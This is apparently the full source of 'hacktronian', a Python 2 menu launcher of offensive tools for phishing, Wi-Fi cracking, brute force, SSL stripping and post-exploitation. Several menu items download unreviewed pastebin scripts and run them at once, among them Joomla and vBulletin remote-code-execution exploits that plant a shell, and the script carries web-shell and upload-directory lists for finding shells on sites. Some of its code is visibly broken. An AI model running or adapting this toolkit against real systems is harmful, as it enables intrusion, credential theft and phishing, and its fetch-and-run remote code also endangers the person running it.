├── .github
    └── FUNDING.yml
├── LICENSE
├── README.md
├── _config.yml
├── hacktronian.py
├── install.sh
├── logo.png
└── update.sh


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
 1 | # These are supported funding model platforms
 2 | 
 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
 4 | patreon: thehackingsage # Replace with a single Patreon username
 5 | open_collective: # Replace with a single Open Collective username
 6 | ko_fi: # Replace with a single Ko-fi username
 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
 9 | liberapay: # Replace with a single Liberapay username
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: ['https://paypal.me/thehackingsage'] # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
13 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 Mr. SAGE
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | <p align="center"><img src="https://github.com/thehackingsage/hacktonian/blob/master/logo.png?raw=true" /></p>
  2 | <br>
  3 | <p align="center">***Pentesing Tools That All Hacker Needs.***</p>
  4 | 
  5 | ## HACKTRONIAN Menu :
  6 | 
  7 | - Information Gathering
  8 | - Password Attacks
  9 | - Wireless Testing
 10 | - Exploitation Tools
 11 | - Sniffing & Spoofing
 12 | - Web Hacking
 13 | - Private Web Hacking
 14 | - Post Exploitation
 15 | - Install The HACKTRONIAN
 16 | 
 17 | ### Information Gathering:
 18 | 
 19 | - Nmap
 20 | - Setoolkit
 21 | - Port Scanning
 22 | - Host To IP
 23 | - wordpress user
 24 | - CMS scanner
 25 | - XSStrike
 26 | - Dork - Google Dorks Passive Vulnerability Auditor
 27 | - Scan A server's Users
 28 | - Crips
 29 | 
 30 | ### Password Attacks:
 31 | 
 32 | - Cupp
 33 | - Ncrack
 34 | 
 35 | ### Wireless Testing:
 36 | 
 37 | - reaver
 38 | - pixiewps
 39 | - Fluxion
 40 | 
 41 | ### Exploitation Tools:
 42 | 
 43 | - ATSCAN
 44 | - sqlmap
 45 | - Shellnoob
 46 | - commix
 47 | - FTP Auto Bypass
 48 | - jboss-autopwn
 49 | 
 50 | ### Sniffing & Spoofing:
 51 | 
 52 | - Setoolkit
 53 | - SSLtrip
 54 | - pyPISHER
 55 | - SMTP Mailer
 56 | 
 57 | ### Web Hacking:
 58 | 
 59 | - Drupal Hacking
 60 | - Inurlbr
 61 | - Wordpress & Joomla Scanner
 62 | - Gravity Form Scanner
 63 | - File Upload Checker
 64 | - Wordpress Exploit Scanner
 65 | - Wordpress Plugins Scanner
 66 | - Shell and Directory Finder
 67 | - Joomla! 1.5 - 3.4.5 remote code execution
 68 | - Vbulletin 5.X remote code execution
 69 | - BruteX - Automatically brute force all services running on a target
 70 | - Arachni - Web Application Security Scanner Framework
 71 | 
 72 | ### Private Web Hacking:
 73 | 
 74 | - Get all websites
 75 | - Get joomla websites
 76 | - Get wordpress websites
 77 | - Control Panel Finder
 78 | - Zip Files Finder
 79 | - Upload File Finder
 80 | - Get server users
 81 | - SQli Scanner
 82 | - Ports Scan (range of ports)
 83 | - ports Scan (common ports)
 84 | - Get server Info
 85 | - Bypass Cloudflare
 86 | 
 87 | ### Post Exploitation:
 88 | 
 89 | - Shell Checker
 90 | - POET
 91 | - Weeman
 92 | 
 93 | ## Installation in Linux :
 94 | 
 95 | This Tool Must Run As ROOT !!!
 96 | 
 97 | ```git clone https://github.com/thehackingsage/hacktronian.git```
 98 | 
 99 | ```cd hacktronian```
100 | 
101 | ```chmod +x install.sh```
102 | 
103 | ```./install.sh```
104 | 
105 | That's it.. you can execute tool by typing **hacktronian**
106 | 
107 | ## Installation in Android :
108 | 
109 | Open [Termux](https://play.google.com/store/apps/details?id=com.termux)
110 | 
111 | ```pkg install git```
112 | 
113 | ```pkg install python```
114 | 
115 | ```git clone https://github.com/thehackingsage/hacktronian.git```
116 | 
117 | ```cd hacktronian```
118 | 
119 | ```chmod +x hacktronian.py```
120 | 
121 | ```python2 hacktronian.py```
122 | 
123 | ## Video Tutorial : 
124 | 
125 | YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4
126 | 
127 | ## License :
128 | 
129 | [MIT Licence](https://github.com/thehackingsage/hacktronian/blob/master/LICENSE)
130 | 
131 | That's It... If You Like This Repo. Please Share This With Your Friends..
132 | 
133 | & Don't Forget To Follow Me At [Twitter](https://www.twitter.com/thehackingsage), [Instagram](https://www.instagram.com/thehackingsage), [Github](https://www.github.com/thehackingsage) & SUBSCRIBE My [YouTube](https://www.youtube.com/channel/UCYK1n9A4TUq1CvGc6F3DzoA) Channel..!!!
134 | 
135 | ***Thankyou.***
136 | ***Keep Visiting..***
137 | ***Enjoy.!!! :)***
138 | 


--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | theme: jekyll-theme-hacker


--------------------------------------------------------------------------------
/hacktronian.py:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/env python2.7
   2 | #
   3 | #   _   _   ___  _____  _   _____________ _____ _   _ _____  ___   _   _ 
   4 | #  | | | | / _ \/  __ \| | / /_   _| ___ \  _  | \ | |_   _|/ _ \ | \ | |
   5 | #  | |_| |/ /_\ \ /  \/| |/ /  | | | |_/ / | | |  \| | | | / /_\ \|  \| |
   6 | #  |  _  ||  _  | |    |    \  | | |    /| | | | . ` | | | |  _  || . ` |
   7 | #  | | | || | | | \__/\| |\  \ | | | |\ \\ \_/ / |\  |_| |_| | | || |\  |
   8 | #  \_| |_/\_| |_/\____/\_| \_/ \_/ \_| \_|\___/\_| \_/\___/\_| |_/\_| \_/
   9 | #                                         ~ Tools For Hacking by Mr. SAGE
  10 | 
  11 | import sys
  12 | import argparse
  13 | import os
  14 | import time
  15 | import httplib
  16 | import subprocess
  17 | import re
  18 | import urllib2
  19 | import socket
  20 | import urllib
  21 | import sys
  22 | import json
  23 | import telnetlib
  24 | import glob
  25 | import random
  26 | import Queue
  27 | import threading
  28 | #import requests
  29 | import base64
  30 | from getpass import getpass
  31 | from commands import *
  32 | from sys import argv
  33 | from platform import system
  34 | from urlparse import urlparse
  35 | from xml.dom import minidom
  36 | from optparse import OptionParser
  37 | from time import sleep
  38 | ##########################
  39 | os.system('clear')
  40 | 
  41 | 
  42 | def menu():
  43 |     print ("""
  44 | MIT License
  45 | 
  46 | Copyright (c) 2018 HACKTRONIAN
  47 | 
  48 | Permission is hereby granted, free of charge, to any person obtaining a copy
  49 | of this software and associated documentation files (the "Software"), to deal
  50 | in the Software without restriction, including without limitation the rights
  51 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  52 | copies of the Software, and to permit persons to whom the Software is
  53 | furnished to do so, subject to the following conditions:
  54 | 
  55 | The above copyright notice and this permission notice shall be included in all
  56 | copies or substantial portions of the Software.
  57 | 
  58 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  59 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  60 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  61 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  62 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  63 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  64 | SOFTWARE.""")
  65 | 
  66 | 
  67 | os.system('clear')
  68 | os.system('clear')
  69 | os.system('clear')
  70 | os.system('clear')
  71 | 
  72 | directories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/',
  73 |                '/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/']
  74 | shells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php',
  75 |           'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php']
  76 | upload = []
  77 | yes = set(['yes', 'y', 'ye', 'Y'])
  78 | no = set(['no', 'n'])
  79 | 
  80 | 
  81 | def logo():
  82 |     print """
  83 |                            - Powered by
  84 |  ___  ___       _____  ___  _____  _____ 
  85 | |  \/  |      /  ___|/ _ \|  __ \|  ___|
  86 | | .  . |_ __  \ `--./ /_\ \ |  \/| |__  
  87 | | |\/| | '__|  `--. \  _  | | __ |  __| 
  88 | | |  | | |_   /\__/ / | | | |_\ \| |___ 
  89 | \_|  |_/_(_)  \____/\_| |_/\____/\____/ 
  90 | """
  91 | 
  92 | 
  93 | hacktronianlogo = """\033[0m
  94 |   _   _    _    ____ _  _______ ____   ___  _   _ ___    _    _   _ 
  95 |  | | | |  / \  / ___| |/ /_   _|  _ \ / _ \| \ | |_ _|  / \  | \ | |
  96 |  | |_| | / _ \| |   | ' /  | | | |_) | | | |  \| || |  / _ \ |  \| |
  97 |  |  _  |/ ___ \ |___| . \  | | |  _ <| |_| | |\  || | / ___ \| |\  |
  98 |  |_| |_/_/   \_\____|_|\_\ |_| |_| \_\_ __/|_| \_|___/_/   \_\_| \_|
  99 |  \033[91m"""
 100 | def menu():
 101 |     print (hacktronianlogo + """\033[1m
 102 |  [!] This Tool Must Run As ROOT [!] https://linktr.ee/thehackingsage
 103 | \033[0m
 104 |    {1}--Information Gathering
 105 |    {2}--Password Attacks
 106 |    {3}--Wireless Testing
 107 |    {4}--Exploitation Tools
 108 |    {5}--Sniffing & Spoofing
 109 |    {6}--Web Hacking
 110 |    {7}--Private Web Hacking
 111 |    {8}--Post Exploitation
 112 |    {0}--Install The HACKTRONIAN
 113 |    {99}-Exit
 114 |  """)
 115 |     choice = raw_input("hacktronian~# ")
 116 |     os.system('clear')
 117 |     if choice == "1":
 118 |         info()
 119 |     elif choice == "2":
 120 |         passwd()
 121 |     elif choice == "3":
 122 |         wire()
 123 |     elif choice == "4":
 124 |         exp()
 125 |     elif choice == "5":
 126 |         snif()
 127 |     elif choice == "6":
 128 |         webhack()
 129 |     elif choice == "7":
 130 |         dzz()
 131 |     elif choice == "8":
 132 |         postexp()
 133 |     elif choice == "0":
 134 |         updatehacktronian()
 135 |     elif choice == "99":
 136 |         clearScr(), sys.exit()
 137 |     elif choice == "":
 138 |         menu()
 139 |     else:
 140 |         menu()
 141 | 
 142 | 
 143 | def updatehacktronian():
 144 |     print ("This Tool is Only Available for Linux and Similar Systems. ")
 145 |     choiceupdate = raw_input("Continue Y / N: ")
 146 |     if choiceupdate in yes:
 147 |         os.system("git clone https://github.com/thehackingsage/hacktronian.git")
 148 |         os.system("cd hacktronian && sudo bash ./update.sh")
 149 |         os.system("hacktronian")
 150 | 
 151 | 
 152 | def doork():
 153 |     print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ")
 154 |     doorkchice = raw_input("Continue Y / N: ")
 155 |     if doorkchice in yes:
 156 |         os.system("pip install beautifulsoup4 && pip install requests")
 157 |         os.system("git clone https://github.com/AeonDave/doork")
 158 |         clearScr()
 159 |         doorkt = raw_input("Target : ")
 160 |         os.system("cd doork && python doork.py -t %s -o log.log" % doorkt)
 161 | 
 162 | 
 163 | def postexp():
 164 |     clearScr()
 165 |     print(hacktronianlogo)
 166 |     print("   {1}--Shell Checker")
 167 |     print("   {2}--POET")
 168 |     print("   {3}--Phishing Framework \n")
 169 |     print("   {99}-Return to main menu \n\n ")
 170 |     choice11 = raw_input("hacktronian~# ")
 171 |     os.system('clear')
 172 |     if choice11 == "1":
 173 |         sitechecker()
 174 |     if choice11 == "2":
 175 |         poet()
 176 |     if choice11 == "3":
 177 |         weeman()
 178 |     elif choice11 == "99":
 179 |         menu()
 180 | 
 181 | 
 182 | def scanusers():
 183 |     site = raw_input('Enter a website : ')
 184 |     try:
 185 |         users = site
 186 |         if 'http://www.' in users:
 187 |             users = users.replace('http://www.', '')
 188 |         if 'http://' in users:
 189 |             users = users.replace('http://', '')
 190 |         if '.' in users:
 191 |             users = users.replace('.', '')
 192 |         if '-' in users:
 193 |             users = users.replace('-', '')
 194 |         if '/' in users:
 195 |             users = users.replace('/', '')
 196 |         while len(users) > 2:
 197 |             print users
 198 |             resp = urllib2.urlopen(
 199 |                 site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()
 200 | 
 201 |             if 'invalid username' not in resp.lower():
 202 |                 print "\tFound -> %s" % users
 203 |                 pass
 204 | 
 205 |             users = users[:-1]
 206 |     except:
 207 |         pass
 208 | 
 209 | 
 210 | def brutex():
 211 |     clearScr()
 212 |     print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ")
 213 |     os.system("git clone https://github.com/1N3/BruteX.git")
 214 |     clearScr()
 215 |     brutexchoice = raw_input("Select a Target : ")
 216 |     os.system("cd BruteX && chmod 777 brutex && ./brutex %s" % brutexchoice)
 217 | 
 218 | 
 219 | def arachni():
 220 |     print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications")
 221 |     cara = raw_input("Install And Run ? Y / N : ")
 222 |     clearScr()
 223 |     print("exemple : http://www.target.com/")
 224 |     tara = raw_input("Select a target to scan : ")
 225 |     if cara in yes:        
 226 |         os.system("git clone git://github.com/Arachni/arachni.git")
 227 |         os.system(
 228 |             "cd arachni && sudo gem install bundler && bundle install --without prof && rake install")
 229 |         os.system("archani")
 230 |     clearScr()
 231 |     os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s" % tara)
 232 | 
 233 | 
 234 | def XSStrike():
 235 |     clearScr()
 236 |     print("XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers")
 237 |     os.system("sudo rm -rf XSStrike")
 238 |     os.system("git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike")
 239 | 
 240 | 
 241 | def crips():
 242 |     clearScr()
 243 |     os.system("git clone https://github.com/Manisso/Crips.git")
 244 |     os.system("cd Crips && sudo bash ./update.sh")
 245 |     os.system("crips")
 246 |     os.system("clear")
 247 | 
 248 | 
 249 | def weeman():
 250 |     print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).")
 251 |     choicewee = raw_input("Install Weeman ? Y / N : ")
 252 |     if choicewee in yes:
 253 |         os.system(
 254 |             "git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py")
 255 |     if choicewee in no:
 256 |         menu()
 257 |     else:
 258 |         menu()
 259 | 
 260 | 
 261 | def gabriel():
 262 |     print("Abusing authentication bypass of Open&Compact (Gabriel's)")
 263 |     os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
 264 |     clearScr()
 265 |     os.system("python gabriel.py")
 266 |     ftpbypass = raw_input("Enter Target IP and Use Command :")
 267 |     os.system("python gabriel.py %s" % ftpbypass)
 268 | 
 269 | 
 270 | def sitechecker():
 271 |     os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py")
 272 |     clearScr()
 273 |     os.system("python ch01.py")
 274 | 
 275 | 
 276 | def h2ip():
 277 |     host = raw_input("Select A Host : ")
 278 |     ips = socket.gethostbyname(host)
 279 |     print(ips)
 280 | 
 281 | 
 282 | def ports():
 283 |     clearScr()
 284 |     target = raw_input('Select a Target IP : ')
 285 |     os.system("nmap -O -Pn %s" % target)
 286 |     sys.exit()
 287 | 
 288 | 
 289 | def ifinurl():
 290 |     print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
 291 |     print('Do You Want To Install InurlBR ? ')
 292 |     cinurl = raw_input("Y/N: ")
 293 |     if cinurl in yes:
 294 |         inurl()
 295 |     if cinurl in no:
 296 |         menu()
 297 |     elif cinurl == "":
 298 |         menu()
 299 |     else:
 300 |         menu()
 301 | 
 302 | 
 303 | def bsqlbf():
 304 |     clearScr()
 305 |     print("This tool will only work on blind sql injection")
 306 |     cbsq = raw_input("select target : ")
 307 |     os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
 308 |     os.system("perl bsqlbf.pl -url %s" % cbsq)
 309 |     os.system("rm bsqlbf.pl")
 310 | 
 311 | 
 312 | def atscan():
 313 |     print ("Do You To Install ATSCAN ?")
 314 |     choiceshell = raw_input("Y/N: ")
 315 |     if choiceshell in yes:
 316 |         os.system("sudo rm -rf ATSCAN")
 317 |         os.system(
 318 |             "git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl")
 319 |     elif choiceshell in no:
 320 |         os.system('clear')
 321 |         menu()
 322 | 
 323 | 
 324 | def commix():
 325 |     print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
 326 |     print ("usage : python commix.py --help")
 327 |     choicecmx = raw_input("Continue: y/n :")
 328 |     if choicecmx in yes:
 329 |         os.system("git clone https://github.com/stasinopoulos/commix.git commix")
 330 |         os.system("cd commix")
 331 |         os.system("python commix.py")
 332 |         os.system("")
 333 |     elif choicecmx in no:
 334 |         os.system('clear')
 335 |         info()
 336 | 
 337 | 
 338 | def pixiewps():
 339 |     print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
 340 |     """
 341 |     choicewps = raw_input("Continue ? Y/N : ")
 342 |     if choicewps in yes:
 343 |         os.system("git clone https://github.com/wiire/pixiewps.git")
 344 |         os.system("cd pixiewps & make ")
 345 |         os.system("sudo make install")
 346 |     if choicewps in no:
 347 |         menu()
 348 |     elif choicewps == "":
 349 |         menu()
 350 |     else:
 351 |         menu()
 352 | 
 353 | 
 354 | def webhack():
 355 |     print(hacktronianlogo)
 356 |     print("   {1}--Drupal Hacking ")
 357 |     print("   {2}--Inurlbr")
 358 |     print("   {3}--Wordpress & Joomla Scanner")
 359 |     print("   {4}--Gravity Form Scanner")
 360 |     print("   {5}--File Upload Checker")
 361 |     print("   {6}--Wordpress Exploit Scanner")
 362 |     print("   {7}--Wordpress Plugins Scanner")
 363 |     print("   {8}--Shell and Directory Finder")
 364 |     print("   {9}--Joomla! 1.5 - 3.4.5 remote code execution")
 365 |     print("   {10}-Vbulletin 5.X remote code execution")
 366 |     print(
 367 |         "   {11}-BruteX - Automatically brute force all services running on a target")
 368 |     print("   {12}-Arachni - Web Application Security Scanner Framework \n ")
 369 |     print("   {99}-Back To Main Menu \n")
 370 |     choiceweb = raw_input("hacktronian~# ")
 371 |     if choiceweb == "1":
 372 |         clearScr()
 373 |         maine()
 374 |     if choiceweb == "2":
 375 |         clearScr()
 376 |         ifinurl()
 377 |     if choiceweb == '3':
 378 |         clearScr()
 379 |         wppjmla()
 380 |     if choiceweb == "4":
 381 |         clearScr()
 382 |         gravity()
 383 |     if choiceweb == "5":
 384 |         clearScr()
 385 |         sqlscan()
 386 |     if choiceweb == "6":
 387 |         clearScr()
 388 |         wpminiscanner()
 389 |     if choiceweb == "7":
 390 |         clearScr()
 391 |         wppluginscan()
 392 |     if choiceweb == "8":
 393 |         clearScr()
 394 |         shelltarget()
 395 |     if choiceweb == "9":
 396 |         clearScr()
 397 |         joomlarce()
 398 |     if choiceweb == "10":
 399 |         clearScr()
 400 |         vbulletinrce()
 401 |     if choiceweb == "11":
 402 |         clearScr()
 403 |         brutex()
 404 |     if choiceweb == "12":
 405 |         clearScr()
 406 |         arachni()
 407 |     elif choiceweb == "99":
 408 |         menu()
 409 |     elif choiceweb == "":
 410 |         menu()
 411 |     else:
 412 |         menu()
 413 | 
 414 | 
 415 | def vbulletinrce():
 416 |     os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl")
 417 |     os.system("perl tmp.pl")
 418 | 
 419 | 
 420 | def joomlarce():
 421 |     os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
 422 |     clearScr()
 423 |     print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
 424 |     jmtarget = raw_input("Select a targets list :")
 425 |     os.system("python temp.py %s" % jmtarget)
 426 | 
 427 | 
 428 | def inurl():
 429 |     dork = raw_input("select a Dork:")
 430 |     output = raw_input("select a file to save :")
 431 |     os.system(
 432 |         "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
 433 |     if cinurl in no:
 434 |         insinurl()
 435 |     elif cinurl == "":
 436 |         menu()
 437 |     else:
 438 |         menu()
 439 | 
 440 | 
 441 | def insinurl():
 442 |     os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
 443 |     os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
 444 |     os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
 445 |     os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
 446 |     clearScr()
 447 |     inurl()
 448 | 
 449 | 
 450 | def nmap():
 451 | 
 452 |     choice7 = raw_input("continue ? Y / N : ")
 453 |     if choice7 in yes:
 454 |         os.system("git clone https://github.com/nmap/nmap.git")
 455 |         os.system("cd nmap && ./configure && make && make install")
 456 |     elif choice7 in no:
 457 |         info()
 458 |     elif choice7 == "":
 459 |         menu()
 460 |     else:
 461 |         menu()
 462 | 
 463 | 
 464 | def jboss():
 465 |     os.system('clear')
 466 |     print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
 467 |     print ("deployed, the script uses its upload and command execution capability to")
 468 |     print ("provide an interactive session.")
 469 |     print ("")
 470 |     print ("usage : ./e.sh target_ip tcp_port ")
 471 |     print("Continue: y/n")
 472 |     choice9 = raw_input("yes / no :")
 473 |     if choice9 in yes:
 474 |         os.system(
 475 |             "git clone https://github.com/SpiderLabs/jboss-autopwn.git"), sys.exit()
 476 |     elif choice9 in no:
 477 |         os.system('clear')
 478 |         exp()
 479 |     elif choice9 == "":
 480 |         menu()
 481 |     else:
 482 |         menu()
 483 | 
 484 | 
 485 | def wppluginscan():
 486 |     Notfound = [404, 401, 400, 403, 406, 301]
 487 |     sitesfile = raw_input("sites file : ")
 488 |     filepath = raw_input("Plugins File : ")
 489 | 
 490 |     def scan(site, dir):
 491 |         global resp
 492 |         try:
 493 |             conn = httplib.HTTPConnection(site)
 494 |             conn.request('HEAD', "/wp-content/plugins/" + dir)
 495 |             resp = conn.getresponse().status
 496 |         except(), message:
 497 |             print "Cant Connect :", message
 498 |             pass
 499 | 
 500 |     def timer():
 501 |         now = time.localtime(time.time())
 502 |         return time.asctime(now)
 503 | 
 504 |     def main():
 505 |         sites = open(sitesfile).readlines()
 506 |         plugins = open(filepath).readlines()
 507 |         for site in sites:
 508 |             site = site.rstrip()
 509 |         for plugin in plugins:
 510 |             plugin = plugin.rstrip()
 511 |             scan(site, plugin)
 512 |             if resp not in Notfound:
 513 |                 print "+----------------------------------------+"
 514 |                 print "| current site :" + site
 515 |                 print "| Found Plugin : " + plugin
 516 |                 print "| Result:", resp
 517 | 
 518 | 
 519 | def sqlmap():
 520 |     print ("usage : python sqlmap.py -h")
 521 |     choice8 = raw_input("Continue: y/n :")
 522 |     if choice8 in yes:
 523 |         os.system(
 524 |             "git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
 525 |     elif choice8 in no:
 526 |         os.system('clear')
 527 |         info()
 528 |     elif choice8 == "":
 529 |         menu()
 530 |     else:
 531 |         menu()
 532 | 
 533 | 
 534 | def grabuploadedlink(url):
 535 |     try:
 536 |         for dir in directories:
 537 |             currentcode = urllib.urlopen(url + dir).getcode()
 538 |             if currentcode == 200 or currentcode == 403:
 539 |                 print "-------------------------"
 540 |                 print "  [ + ] Found Directory :  " + str(url + dir) + " [ + ]"
 541 |                 print "-------------------------"
 542 |                 upload.append(url + dir)
 543 |     except:
 544 |         pass
 545 | 
 546 | 
 547 | def grabshell(url):
 548 |     try:
 549 |         for upl in upload:
 550 |             for shell in shells:
 551 |                 currentcode = urllib.urlopen(upl + shell).getcode()
 552 |                 if currentcode == 200:
 553 |                     print "-------------------------"
 554 |                     print "  [ ! ] Found Shell :  " + str(upl + shell) + " [ ! ]"
 555 |                     print "-------------------------"
 556 |     except:
 557 |         pass
 558 | 
 559 | 
 560 | def shelltarget():
 561 |     print("exemple : http://target.com")
 562 |     line = raw_input("target : ")
 563 |     line = line.rstrip()
 564 |     grabuploadedlink(line)
 565 |     grabshell(line)
 566 | 
 567 | 
 568 | def poet():
 569 |     print("POET is a simple POst-Exploitation Tool.")
 570 |     print("")
 571 |     choicepoet = raw_input("y / n :")
 572 |     if choicepoet in yes:
 573 |         os.system("git clone https://github.com/mossberg/poet.git")
 574 |         os.system("python poet/server.py")
 575 |     if choicepoet in no:
 576 |         clearScr()
 577 |         postexp()
 578 |     elif choicepoet == "":
 579 |         menu()
 580 |     else:
 581 |         menu()
 582 | 
 583 | 
 584 | def setoolkit():
 585 |     print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
 586 |     print(") designed for social engineering. SET has a number of custom attack vectors that ")
 587 |     print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC  ")
 588 |     print("an information security consulting firm located in Cleveland, Ohio.")
 589 |     print("")
 590 | 
 591 |     choiceset = raw_input("y / n :")
 592 |     if choiceset in yes:
 593 |         os.system(
 594 |             "git clone https://github.com/trustedsec/social-engineer-toolkit.git")
 595 |         os.system("python social-engineer-toolkit/setup.py")
 596 |     if choiceset in no:
 597 |         clearScr()
 598 |         info()
 599 |     elif choiceset == "":
 600 |         menu()
 601 |     else:
 602 |         menu()
 603 | 
 604 | 
 605 | def cupp():
 606 |     print("cupp is a password list generator ")
 607 |     print("Usage: python cupp.py -h")
 608 |     choicecupp = raw_input("Continue: y/n : ")
 609 | 
 610 |     if choicecupp in yes:
 611 |         os.system("git clone https://github.com/Mebus/cupp.git")
 612 |         print("file downloaded successfully")
 613 |     elif choicecupp in no:
 614 |         clearScr()
 615 |         passwd()
 616 |     elif choicecupp == "":
 617 |         menu()
 618 |     else:
 619 |         menu()
 620 | 
 621 | 
 622 | def ncrack():
 623 |     print("A Ruby interface to Ncrack, Network authentication cracking tool.")
 624 |     print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
 625 |     print("Continue: y/n")
 626 |     choicencrack = raw_input("y / n :")
 627 |     if choicencrack in yes:
 628 |         os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
 629 |         os.system("cd ruby-ncrack")
 630 |         os.system("install ruby-ncrack")
 631 |     elif choicencrack in no:
 632 |         clearScr()
 633 |         passwd()
 634 |     elif choicencrack == "":
 635 |         menu()
 636 |     else:
 637 |         menu()
 638 | 
 639 | 
 640 | def reaver():
 641 |     print """
 642 |       Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
 643 |       WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
 644 |       wide variety of access points and WPS implementations
 645 |       1 to accept / 0 to decline
 646 |         """
 647 |     creaver = raw_input("y / n :")
 648 |     if creaver in yes:
 649 |         os.system(
 650 |             "apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
 651 |         os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
 652 |         os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
 653 |         os.system("cd reaver-wps-fork-t6x/src/ & make")
 654 |     elif creaver in no:
 655 |         clearScr()
 656 |         wire()
 657 |     elif creaver == "":
 658 |         menu()
 659 |     else:
 660 |         menu()
 661 | 
 662 | 
 663 | def ssls():
 664 |     print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
 665 |     attacks.
 666 |     It requires Python 2.5 or newer, along with the 'twisted' python module."""
 667 |     cssl = raw_input("y / n :")
 668 |     if cssl in yes:
 669 |         os.system("git clone https://github.com/moxie0/sslstrip.git")
 670 |         os.system("sudo apt-get install python-twisted-web")
 671 |         os.system("python sslstrip/setup.py")
 672 |     if cssl in no:
 673 |         snif()
